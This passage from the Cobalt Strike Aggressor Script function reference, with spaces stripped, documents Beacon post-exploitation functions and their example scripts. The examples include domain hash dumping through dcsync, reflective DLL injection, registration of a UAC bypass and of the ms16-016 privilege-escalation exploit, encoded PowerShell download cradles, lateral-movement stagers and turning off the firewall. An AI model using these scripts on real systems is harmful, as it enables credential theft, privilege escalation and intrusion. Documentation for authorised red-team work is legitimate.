+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandtospoofargumentsfor.EnvironmentvariablesareOKheretoo.
+Example
+# don't spoof cmd.exe
+bargue_remove($1, "%COMSPEC%");
+base64_decode
+Unwrapabase64-encodedstring
+Arguments
+$1-thestringtodecode
+Returns
+Theargumentprocessedbyabase64decoder
+CobaltStrikeUserGuide www.fortra.com page:269
+
+AggressorScript/Functions
+Example
+println(base64_decode(base64_encode("this is a test")));
+base64_encode
+Base64encodeastring
+Arguments
+$1-thestringtoencode
+Returns
+Theargumentprocessedbyabase64encoder
+Example
+println(base64_encode("this is a test"));
+bblockdlls
+Launchchildprocesseswithbinarysignaturepolicythatblocksnon-MicrosoftDLLsfrom
+loadingintheprocessspace.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-trueorfalse;blocknon-MicrosoftDLLsinchildprocess
+Note
+ThisattributeisavailableinWindows10only.
+Example
+on beacon_initial {
+binput($1, "blockdlls start");
+CobaltStrikeUserGuide www.fortra.com page:270
+
+AggressorScript/Functions
+bblockdlls($1, true);
+}
+bbrowser
+GeneratethebeaconbrowserGUIcomponent.ShowsonlyBeacons.
+Returns
+ThebeaconbrowserGUIobject(ajavax.swing.JComponent)
+Example
+addVisualization("Beacon Browser", bbrowser());
+Seealso
+&showVisualization
+bbrowserpivot
+StartaBrowserPivot
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thePIDtoinjectthebrowserpivotagentinto.
+$3-thearchitectureofthetargetPID(x86|x64)
+Example
+bbrowserpivot($1, 1234, "x86");
+bbrowserpivot_stop
+StopaBrowserPivot
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:271
+
+AggressorScript/Functions
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+bbrowserpivot_stop($1);
+bbypassuac
+REMOVED Removed in Cobalt Strike 4.0.
+bcancel
+Cancelafiledownload
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thefiletocancelorawildcard.
+Example
+item "&Cancel Downloads" {
+bcancel($1, "*");
+}
+bcd
+AskaBeacontochangeit'scurrentworkingdirectory.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thefoldertochangeto.
+Example
+# create a command to change to the user's home directory
+alias home {
+CobaltStrikeUserGuide www.fortra.com page:272
+
+AggressorScript/Functions
+$home = "c:\\users\\" . binfo($1, "user");
+bcd($1, $home);
+}
+bcheckin
+AskaBeacontocheckin.Thisisbasicallyano-opforBeacon.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+item "&Checkin" {
+binput($1, "checkin");
+bcheckin($1);
+}
+bclear
+Thisisthe"oops"command.Itclearsthequeuedtasksforthespecifiedbeacon.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+bclear($1);
+bconnect
+AskBeacon(orSSHsession)toconnecttoaBeaconpeeroveraTCPsocket
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetargettoconnectto
+CobaltStrikeUserGuide www.fortra.com page:273
+
+AggressorScript/Functions
+$3-(optional)theporttouse.Defaultprofileportisusedotherwise.
+Note
+Use&beacon_linkifyouwantascriptfunctionthatwillconnectorlinkbasedonalistener
+configuration.
+Example
+bconnect($1, "DC");
+bcovertvpn
+AskBeacontodeployaCovertVPNclient.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theCovertVPNinterfacetodeploy
+$3-theIPaddressoftheinterface[ontarget]tobridgeinto
+$4-(optional)theMACaddressoftheCovertVPNinterface
+Example
+bcovertvpn($1, "phear0", "172.16.48.18");
+bcp
+AskBeacontocopyafileorfolder.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thefileorfoldertocopy
+$3-thedestination
+CobaltStrikeUserGuide www.fortra.com page:274
+
+AggressorScript/Functions
+Example
+bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");
+bdata
+GetmetadataforaBeaconsession.
+Arguments
+$1-theidforthebeacontopullmetadatafor
+Returns
+AdictionaryobjectwithmetadataabouttheBeaconsession.
+Example
+println(bdata("1234"));
+bdcsync
+Usemimikatz'sdcsynccommandtopullauser'spasswordhashfromadomaincontroller.This
+functionrequiresadomainadministratortrustrelationship.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-fullyqualifiednameofthedomain
+$3-(optional)DOMAIN\usertopullhashesfor
+$4-(optional)thePIDtoinjectthedcsynccommandintoor$null
+$5-(optional)thearchitectureofthetargetPID(x86|x64)or$null
+Note
+CobaltStrikeUserGuide www.fortra.com page:275
+
+AggressorScript/Functions
+If$3isleftout,dcsyncwilldumpalldomainhashes.
+Examples
+Spawnatemporaryprocess
+# dump a specific account
+bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");
+# dump all accounts
+bdcsync($1, "PLAYLAND.testlab");
+Injectintothespecifiedprocess
+# dump a specific account
+bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");
+# dump all accounts
+bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");
+bdesktop
+StartaVNCsession.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+item "&Desktop (VNC)" {
+bdesktop($1);
+}
+bdllinject
+InjectaReflectiveDLLintoaprocess.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:276
+
+AggressorScript/Functions
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thePIDtoinjecttheDLLinto
+$3-thelocalpathtotheReflectiveDLL
+Example
+bdllinject($1, 1234, script_resource("test.dll"));
+bdllload
+CallLoadLibrary()inaremoteprocesswiththespecifiedDLL.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetargetprocessPID
+$3-theon-targetpathtoaDLL
+Note
+TheDLLmustbethesamearchitectureasthetargetprocess.
+Example
+bdllload($1, 1234, "c:\\windows\\mystuff.dll");
+bdllspawn
+SpawnaReflectiveDLLasaBeaconpost-exploitationjob.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thelocalpathtotheReflectiveDLL
+$3-aparametertopasstotheDLL
+CobaltStrikeUserGuide www.fortra.com page:277
+
+AggressorScript/Functions
+$4-ashortdescriptionofthispostexploitationjob(showsupinjobsoutput)
+$5-true/false;useimpersonatedtokenwhenrunningthispost-exjob?
+$6-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Notes
+l Thisfunctionwillspawnanx86processiftheReflectiveDLLisanx86DLL.Likewise,if
+theReflectiveDLLisanx64DLL,thisfunctionwillspawnanx64process.
+l Awell-behavedReflectiveDLLfollowstheserules:
+o ReceivesaparameterviathereservedDllMainparameterwhentheDLL_
+PROCESS_ATTACHreasonisspecified.
+o PrintsmessagestoSTDOUT
+o Callsfflush(stdout)toflushSTDOUT
+o CallsExitProcess(0)whendone.Thiskillsthespawnedprocesstohostthe
+capability.
+Example(ReflectiveDll.c)
+ThisexampleisbasedonStephenFewer'sReflectiveDLLInjectionProject:
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
+BOOL bReturnValue = TRUE;
+switch( dwReason ) {
+case DLL_QUERY_HMODULE:
+if( lpReserved != NULL )
+*(HMODULE *)lpReserved = hAppInstance;
+break;
+case DLL_PROCESS_ATTACH:
+hAppInstance = hinstDLL;
+/* print some output to the operator */
+if (lpReserved != NULL) {
+printf("Hello from test.dll.
+Parameter is '%s'\n", (char *)lpReserved);
+}
+else {
+printf("Hello from test.dll. There is no parameter\n");
+}
+/* flush STDOUT */
+CobaltStrikeUserGuide www.fortra.com page:278
+
+AggressorScript/Functions
+fflush(stdout);
+/* we're done, so let's exit */
+ExitProcess(0);
+break;
+case DLL_PROCESS_DETACH:
+case DLL_THREAD_ATTACH:
+case DLL_THREAD_DETACH:
+break;
+}
+return bReturnValue;
+}
+Example(AggressorScript)
+alias hello {
+bdllspawn($1, script_resource("reflective_dll.dll"), $2,
+"test dll", 5000, false);
+}
+bdownload
+AskaBeacontodownloadafile
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thefiletorequest
+Example
+bdownload($1, "c:\\sysprep.inf");
+bdrives
+AskBeacontolistthedrivesonthecompromisedsystem
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+CobaltStrikeUserGuide www.fortra.com page:279
+
+AggressorScript/Functions
+Example
+item "&Drives" {
+binput($1, "drives");
+bdrives($1);
+}
+beacon_command_describe
+DescribeaBeaconcommand.
+Returns
+AstringdescriptionoftheBeaconcommand.
+Arguments
+$1-thecommand
+Example
+println(beacon_command_describe("ls"));
+beacon_command_detail
+GetthehelpinformationforaBeaconcommand.
+Returns
+AstringwithhelpfulinformationaboutaBeaconcommand.
+Arguments
+$1-thecommand
+Example
+println(beacon_command_detail("ls"));
+CobaltStrikeUserGuide www.fortra.com page:280
+
+AggressorScript/Functions
+beacon_command_register
+RegisterhelpinformationforaBeaconcommand.
+Arguments
+$1-thecommand
+$2-theshortdescriptionofthecommand
+$3-thelong-formhelpforthecommand.
+Example
+alis echo {
+blog($1, "You typed: " . substr($1, 5));
+}
+beacon_command_register(
+"echo",
+"echo text to beacon log",
+"Synopsis: echo [arguments]\n\nLog arguments to the beacon console");
+beacon_commands
+GetalistofBeaconcommands.
+Returns
+AnarrayofBeaconcommands.
+Example
+printAll(beacon_commands());
+beacon_data
+GetmetadataforaBeaconsession.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:281
+
+AggressorScript/Functions
+$1-theidforthebeacontopullmetadatafor
+Returns
+AdictionaryobjectwithmetadataabouttheBeaconsession.
+Example
+println(beacon_data("1234"));
+beacon_elevator_describe
+DescribeaBeaconcommandelevatorexploit
+Returns
+AstringdescriptionoftheBeaconcommandelevator
+Arguments
+$1-theexploit
+Example
+println(beacon_elevator_describe("uac-token-duplication"));
+SeeAlso
+&beacon_elevator_register,&beacon_elevators,&belevate_command
+beacon_elevator_register
+RegisteraBeaconcommandelevatorwithCobaltStrike.Thisaddsanoptiontotherunasadmin
+command.
+Arguments
+$1-theexploitshortname
+$2-adescriptionoftheexploit
+CobaltStrikeUserGuide www.fortra.com page:282
+
+AggressorScript/Functions
+$3-thefunctionthatimplementstheexploit($1istheBeaconID,$2thecommandand
+arguments)
+Example
+# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
+# Sourced from Empire:
+https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
+sub schtasks_elevator {
+local('$handle $script $oneliner $command');
+# acknowledge this command
+btask($1, "Tasked Beacon to execute $2 in a high integrity context",
+"T1088");
+# read in the script
+$handle = openf(getFileProper(script_resource("modules"), "Invoke-
+EnvBypass.ps1"));
+$script = readb($handle, -1);
+closef($handle);
+# host the script in Beacon
+$oneliner = beacon_host_script($1, $script);
+# base64 encode the command
+$command = transform($2, "powershell-base64");
+# run the specified command via this exploit.
+bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"",
+$oneliner);
+}
+beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via
+SilentCleanup)", &schtasks_elevator);
+SeeAlso
+&beacon_elevator_describe,&beacon_elevators,&belevate_command
+beacon_elevators
+GetalistofcommandelevatorexploitsregisteredwithCobaltStrike.
+Returns
+CobaltStrikeUserGuide www.fortra.com page:283
+
+AggressorScript/Functions
+AnarrayofBeaconcommandelevators
+Example
+printAll(beacon_elevators());
+Seealso
+&beacon_elevator_describe,&beacon_elevator_register,&belevate_command
+beacon_execute_job
+Runacommandandreportitsoutputtotheuser.
+Arguments
+$1-theBeaconID
+$2-thecommandtorun(environmentvariablesareresolved)
+$3-thecommandarguments(environmentvariablesarenotresolved).
+$4-flagsthatchangehowthejobislaunched(e.g.,1=disableWOW64filesystemredirection)
+Notes
+l Thestring$2and$3arecombinedas-isintoacommandline.Makesureyoubegin$3
+withaspace!
+l Thisisthemechanism CobaltStrikeusesforitsshellandpowershellcommands.
+Example
+alias shell {
+local('$args');
+$args = substr($0, 6);
+btask($1, "Tasked beacon to run: $args", "T1059");
+beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
+}
+beacon_exploit_describe
+CobaltStrikeUserGuide www.fortra.com page:284
+
+AggressorScript/Functions
+DescribeaBeaconexploit
+Returns
+AstringdescriptionoftheBeaconexploit
+Arguments
+$1-theexploit
+Example
+println(beacon_exploit_describe("ms14-058"));
+SeeAlso
+&beacon_exploit_register,&beacon_exploits,&belevate
+beacon_exploit_register
+RegisteraBeaconprivilegeescalationexploitwithCobaltStrike.Thisaddsanoptiontothe
+elevatecommand.
+Arguments
+$1-theexploitshortname
+$2-adescriptionoftheexploit
+$3-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthelistener)
+Example
+# Integrate windows/local/ms16_016_webdav from Metasploit
+# https://github.com/rapid7/metasploit-
+framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb
+sub ms16_016_exploit {
+local('$stager');
+# check if we're on an x64 system and error out.
+CobaltStrikeUserGuide www.fortra.com page:285
+
+AggressorScript/Functions
+if (-is64 $1) {
+berror($1, "ms16-016 exploit is x86 only");
+return;
+}
+# acknowledge this command
+btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016",
+"T1068");
+# generate our shellcode
+$stager = payload($2, "x86");
+# spawn a Beacon post-ex job with the exploit DLL
+bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-
+0051.x86.dll"), $stager, "ms16-016", 5000);
+# link to our payload if it's a TCP or SMB Beacon
+beacon_link($1, $null, $2);
+}
+beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege
+Escalation (CVE 2016-0051)", &ms16_016_exploit);
+SeeAlso
+&beacon_exploit_describe,&beacon_exploits,&belevate
+beacon_exploits
+GetalistofprivilegeescalationexploitsregisteredwithCobaltStrike.
+Returns
+AnarrayofBeaconexploits.
+Example
+printAll(beacon_exploits());
+Seealso
+&beacon_exploit_describe,&beacon_exploit_register,&belevate
+CobaltStrikeUserGuide www.fortra.com page:286
+
+AggressorScript/Functions
+beacon_host_imported_script
+LocallyhostapreviouslyimportedPowerShellscriptwithinBeaconandreturnashortscript
+thatwilldownloadandinvokethisscript.
+Arguments
+$1-theidoftheBeacontohostthisscriptwith.
+Returns
+AshortPowerShellscripttodownloadandevaluatethepreviouslyscriptwhenrun.Howthis
+one-linerisusedisuptoyou!
+Example
+alias powershell {
+local('$args $cradle $runme $cmd');
+# $0 is the entire command with no parsing.
+$args = substr($0, 11);
+# generate the download cradle (if one exists) for an imported PowerShell
+script
+$cradle = beacon_host_imported_script($1);
+# encode our download cradle AND cmdlet+args we want to run
+$runme = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
+# Build up our entire command line.
+$cmd = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
+# task Beacon to run all of this.
+btask($1, "Tasked beacon to run: $args", "T1086");
+beacon_execute_job($1, "powershell", $cmd, 1);
+}
+beacon_host_script
+LocallyhostaPowerShellscriptwithinBeaconandreturnashortscriptthatwilldownloadand
+invokethisscript.Thisfunctionisawaytorunlargescriptswhenthereareconstraintsonthe
+lengthofyourPowerShellone-liner.
+CobaltStrikeUserGuide www.fortra.com page:287
+
+AggressorScript/Functions
+Arguments
+$1-theidoftheBeacontohostthisscriptwith.
+$2-thescriptdatatohost.
+Returns
+AshortPowerShellscripttodownloadandevaluatethescriptwhenrun.Howthisone-lineris
+usedisuptoyou!
+Example
+alias test {
+local('$script $hosted');
+$script = "2 + 2";
+$hosted = beacon_host_script($1, $script);
+binput($1, "powerpick $hosted");
+bpowerpick($1, $hosted);
+}
+beacon_ids
+GettheIDofallBeaconscallingbacktothisCobaltStriketeamserver.
+Returns
+AnarrayofbeaconIDs
+Example
+foreach $bid (beacon_ids()) {
+println("Bid: $bid");
+}
+beacon_info
+GetinformationfromaBeaconsession'smetadata.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:288
+
+AggressorScript/Functions
+$1-theidforthebeacontopullmetadatafor
+$2-thekeytoextract
+Returns
+Astringwiththerequestedinformation.
+Example
+println("User is: " . beacon_info("1234", "user"));
+println("PID is: " . beacon_info("1234", "pid"));
+beacon_inline_execute
+ExecuteaBeaconObjectFile
+Arguments
+$1-theidfortheBeacon
+$2-astringcontainingtheBOFfile
+$3-theentrypointtocall
+$4-packedargumentstopasstotheBOFfile
+$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Note
+TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on
+page 171.
+Example(hello.c)
+/*
+* Compile with:
+* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
+* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
+*/
+CobaltStrikeUserGuide www.fortra.com page:289
+
+AggressorScript/Functions
+#include "windows.h"
+#include "stdio.h"
+#include "tlhelp32.h"
+#include "beacon.h"
+void demo(char * args, int length) {
+datap parser;
+char * str_arg;
+int num_arg;
+BeaconDataParse(&parser, args, length);
+str_arg = BeaconDataExtract(&parser, NULL);
+num_arg = BeaconDataInt(&parser);
+BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_
+arg);
+}
+Example(hello.cna)
+alias hello {
+local('$barch $handle $data $args');
+# figure out the arch of this session
+$barch = barch($1);
+# read in the right BOF file
+$handle = openf(script_resource("hello. $+ $barch $+ .o"));
+$data = readb($handle, -1);
+closef($handle);
+# pack our arguments
+$args = bof_pack($1, "zi", "Hello World", 1234);
+# announce what we're doing
+btask($1, "Running Hello BOF");
+# execute it.
+beacon_inline_execute($1, $data, "demo", $args);
+}
+SeeAlso
+&bof_pack
+CobaltStrikeUserGuide www.fortra.com page:290
+
+AggressorScript/Functions
+beacon_link
+ThisfunctionlinkstoanSMBorTCPlistener.IfthespecifiedlistenerisnotanSMBorTCP
+listener,thisfunctiondoesnothing.
+Arguments
+$1-theidofthebeacontolinkthrough
+$2-thetargethosttolinkto.Use$nullforlocalhost.
+$3-thelistenertolink
+Example
+# smartlink [target] [listener name]
+alias smartlink {
+beacon_link($1, $2, $3);
+}
+beacon_remote_exec_method_describe
+DescribeaBeaconremoteexecutemethod
+Returns
+AstringdescriptionoftheBeaconremoteexecutemethod.
+Arguments
+$1-themethod
+Example
+println(beacon_remote_exec_method_describe("wmi"));
+Seealso
+&beacon_remote_exec_method_register,&beacon_remote_exec_methods,&bremote_exec
+CobaltStrikeUserGuide www.fortra.com page:291
+
+AggressorScript/Functions
+beacon_remote_exec_method_register
+RegisteraBeaconremoteexecutemethodwithCobaltStrike.Thisaddsanoptionforusewith
+theremote-execcommand.
+Arguments
+$1-themethodshortname
+$2-adescriptionofthemethod
+$3-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthetarget,$3isthe
+command+args)
+SeeAlso
+&beacon_remote_exec_method_describe,&beacon_remote_exec_methods,&bremote_exec
+beacon_remote_exec_methods
+GetalistofremoteexecutemethodsregisteredwithCobaltStrike.
+Returns
+Anarrayofremoteexecmodules.
+Example
+printAll(beacon_remote_exec_methods());
+Seealso
+&beacon_remote_exec_method_describe,&beacon_remote_exec_method_register,&bremote_
+exec
+beacon_remote_exploit_arch
+GetthearchinfoforthisBeaconlateralmovementoption.
+CobaltStrikeUserGuide www.fortra.com page:292
+
+AggressorScript/Functions
+Arguments
+$1-theexploit
+Returns
+x86orx64
+Example
+println(beacon_remote_exploit_arch("psexec"));
+SeeAlso
+&beacon_remote_exploit_register,&beacon_remote_exploits,&bjump
+beacon_remote_exploit_describe
+DescribeaBeaconlateralmovementoption.
+Returns
+AstringdescriptionoftheBeaconlateralmovementoption.
+Arguments
+$1-theexploit
+Example
+println(beacon_remote_exploit_describe("psexec"));
+SeeAlso
+&beacon_remote_exploit_register,&beacon_remote_exploits,&bjump
+beacon_remote_exploit_register
+CobaltStrikeUserGuide www.fortra.com page:293
+
+AggressorScript/Functions
+RegisteraBeaconlateralmovementoptionwithCobaltStrike.Thisfunctionextendsthejump
+command.
+Arguments
+$1-theexploitshortname
+$2-thearchassociatedwiththisattack(e.g.,x86,x64)
+$3-adescriptionoftheexploit
+$4-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthetarget,$3isthe
+listener)
+Seealso
+&beacon_remote_exploit_describe,&beacon_remote_exploits,&bjump
+beacon_remote_exploits
+GetalistoflateralmovementoptionsregisteredwithCobaltStrike.
+Returns
+Anarrayoflateralmovementoptionnames.
+Example
+printAll(beacon_remote_exploits());
+Seealso
+&beacon_remote_exploit_describe,&beacon_remote_exploit_register,&bjump
+beacon_remove
+RemoveaBeaconfromthedisplay.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:294
+
+AggressorScript/Functions
+$1-theidforthebeacontoremove
+beacon_stage_pipe
+Thisfunctionhandlesthestagingprocessforabindpipestager.Thisisanoptionalstagerfor
+lateralmovement.Youcanstageanyx86payload/listenerthroughthisstager.Use&stager_
+bind_pipetogeneratethisstager.
+Arguments
+$1-theidofthebeacontostagethrough
+$2-thetargethost
+$3-thelistenername
+$4-thearchitectureofthepayloadtostage.x86istheonlyoptionrightnow.
+Example
+# step 1. generate our stager
+$stager = stager_bind_pipe("my listener");
+# step 2. do something to run our stager
+# step 3. stage a payload via this stager
+beacon_stage_pipe($bid, $target, "my listener", "x86");
+# step 4. assume control of the payload (if needed)
+beacon_link($bid, $target, "my listener");
+beacon_stage_tcp
+ThisfunctionhandlesthestagingprocessforabindTCPstager.Thisisthepreferredstagerfor
+localhost-onlystaging.Youcanstageanypayload/listenerthroughthisstager.Use&stager_
+bind_tcptogeneratethisstager.
+Arguments
+$1-theidofthebeacontostagethrough
+$2-reserved;use$nullfornow.
+CobaltStrikeUserGuide www.fortra.com page:295
+
+AggressorScript/Functions
+$3-theporttostageto
+$4-thelistenername
+$5-thearchitectureofthepayloadtostage(x86,x64)
+Example
+# step 1. generate our stager
+$stager = stager_bind_tcp("my listener", "x86", 1234);
+# step 2. do something to run our stager
+# step 3. stage a payload via this stager
+beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
+# step 4. assume control of the payload (if needed)
+beacon_link($bid, $target, "my listener");
+beacons
+GetinformationaboutallBeaconscallingbacktothisCobaltStriketeamserver.
+Returns
+Anarrayofdictionaryobjectswithinformationabouteachbeacon.
+Example
+foreach $beacon (beacons()) {
+println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
+}
+belevate
+AskBeacontospawnanelevatedsessionwitharegisteredtechnique.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theexploittofire
+CobaltStrikeUserGuide www.fortra.com page:296
+
+AggressorScript/Functions
+$3-thelistenertotarget.
+Example
+item "&Elevate 31337" {
+openPayloadHelper(lambda({
+binput($bids, "elevate ms14-058 $1");
+belevate($bids, "ms14-058", $1);
+}, $bids => $1));
+}
+Seealso
+&beacon_exploit_describe,&beacon_exploit_register,&beacon_exploits
+belevate_command
+AskBeacontorunacommandinahigh-integritycontext
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-themodule/commandelevatortouse
+$3-thecommandanditsarguments.
+Example
+# disable the firewall
+alias shieldsdn {
+belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall
+set allprofiles state off");
+}
+Seealso
+&beacon_elevator_describe,&beacon_elevator_register,&beacon_elevators
+berror
+CobaltStrikeUserGuide www.fortra.com page:297
+
+AggressorScript/Functions
+PublishanerrormessagetotheBeacontranscript
+Arguments
+$1-theidforthebeacontopostto
+$2-thetexttopost
+Example
+alias donotrun {
+berror($1, "You should never run this command!");
+}
+bexecute
+AskBeacontoexecuteacommand[withoutashell].Thisprovidesnooutputtotheuser.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandandargumentstorun
+Example
+bexecute($1, "notepad.exe");
+bexecute_assembly
+Spawnsalocal.NETexecutableassemblyasaBeaconpost-exploitationjob.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thelocalpathtothe.NETexecutableassembly
+$3-parameterstopasstotheassembly
+CobaltStrikeUserGuide www.fortra.com page:298
+
+AggressorScript/Functions
+$4-(optional)the"PATCHES:"argumentcanmodifyfunctionsinmemoryfortheprocess.Upto
+4"patch-rule"rulescanbespecified(spacedelimited).
+$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-
+patch-value]
+library -1-260characters
+function -1-256characters
+offset -0-65535(Theoffsetfromthestartoftheexecutablefunction)
+hex-patch-value-2-200hexcharacters(0-9,A-F).Lengthmustbeevennumber(hex
+pairs).
+Notes
+l Thiscommandacceptsavalid.NETexecutableandcallsitsentrypoint.
+l Thispost-exploitationjobinheritsBeacon'sthreadtoken.
+l Compileyourcustom .NETprogramswitha.NET3.5compilerforcompatibilitywith
+systemsthatdon'thave.NET4.0andlater.
+Example
+alias myutil {
+bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg
+3\"");
+}
+bexit
+AskaBeacontoexit.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+item "&Die" {
+binput($1, "exit");
+CobaltStrikeUserGuide www.fortra.com page:299
+
+AggressorScript/Functions
+bexit($1);
+}
+bgetprivs
+AttemptstoenablethespecifiedprivilegeinyourBeaconsession.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-acomma-separatedlistofprivilegestoenable.See:
+https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx
+Example
+alias debug {
+bgetprivs($1, "SeDebugPriv");
+}
+bgetsystem
+AskBeacontoattempttogettheSYSTEMtoken.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+item "Get &SYSTEM" {
+binput($1, "getsystem");
+bgetsystem($1);
+}
+bgetuid
+AskBeacontoprinttheUserIDofthecurrenttoken
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:300
+
+AggressorScript/Functions
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+bgetuid($1);
+bhashdump
+AskBeacontodumplocalaccountpasswordhashes.Ifinjectingintoapidthatprocessrequires
+administratorprivileges.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2 -thePIDtoinjectthehashdumpdllintoor$null.
+$3 -(optional)thearchitectureofthetargetPID(x86|x64)or$null.
+$4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap.
+Example
+Spawnatemporaryprocess
+item "Dump &Hashes" {
+binput($1, "hashdump");
+bhashdump($1);
+}
+Injectintothespecifiedprocess)
+bhashdump($1, 1234, "x64");
+bind
+BindakeyboardshortcuttoanAggressorScriptfunction.Thisisanalternatetothebind
+keyword.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:301
+
+AggressorScript/Functions
+$1-thekeyboardshortcut
+$2-acallbackfunction.Calledwhentheeventhappens.
+Example
+# bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.
+bind("Ctrl+Left", {
+previousTab();
+});
+bind("Ctrl+Right", {
+nextTab();
+});
+Seealso
+&unbind
+binfo
+GetinformationfromaBeaconsession'smetadata.
+Arguments
+$1-theidforthebeacontopullmetadatafor
+$2-thekeytoextract
+Returns
+Astringwiththerequestedinformation.
+Example
+println("User is: " . binfo("1234", "user"));
+println("PID is: " . binfo("1234", "pid"));
+binline_execute
+CobaltStrikeUserGuide www.fortra.com page:302
+
+AggressorScript/Functions
+ExecuteaBeaconObjectFile.Thisisthesameasusingtheinline-executecommandinBeacon.
+Arguments
+$1-theidfortheBeacon
+$2-thepathtotheBOFfile
+$3-thestringargumenttopasstotheBOFfile
+$4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Notes
+Thisfunctionsfollowsthebehaviorof*inline-execute*intheBeaconconsole.Thestring
+argumentwillbezero-terminated,convertedtothetargetencoding,andpassedasanargument
+totheBOF'sgofunction.ToexecuteaBOF,withmorecontrol,use&beacon_inline_execute
+TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on
+page 171.
+binput
+ReportacommandwasruntotheBeaconconsoleandlogs.Scriptsthatexecutecommands
+fortheuser(e.g.,events,popupmenus)shouldusethisfunctiontoassureoperatorattribution
+ofautomatedactionsinBeacon'slogs.
+Arguments
+$1-theidforthebeacontopostto
+$2-thetexttopost
+Example
+# indicate the user ran the ls command
+binput($1, "ls");
+bipconfig
+TaskaBeacontolistnetworkinterfaces.
+CobaltStrikeUserGuide www.fortra.com page:303
+
+AggressorScript/Functions
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-callbackfunctionwiththeipconfigresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Example
+alias ipconfig {
+bipconfig($1, {
+blog($1, "Network information is:\n $+ $2");
+});
+}
+bjobkill
+AskBeacontokillarunningpost-exploitationjob
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thejobID.
+Example
+bjobkill($1, 0);
+bjobs
+AskBeacontolistrunningpost-exploitationjobs.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+bjobs($1);
+CobaltStrikeUserGuide www.fortra.com page:304
+
+AggressorScript/Functions
+bjump
+AskBeacontospawnasessiononaremotetarget.
+Arguments
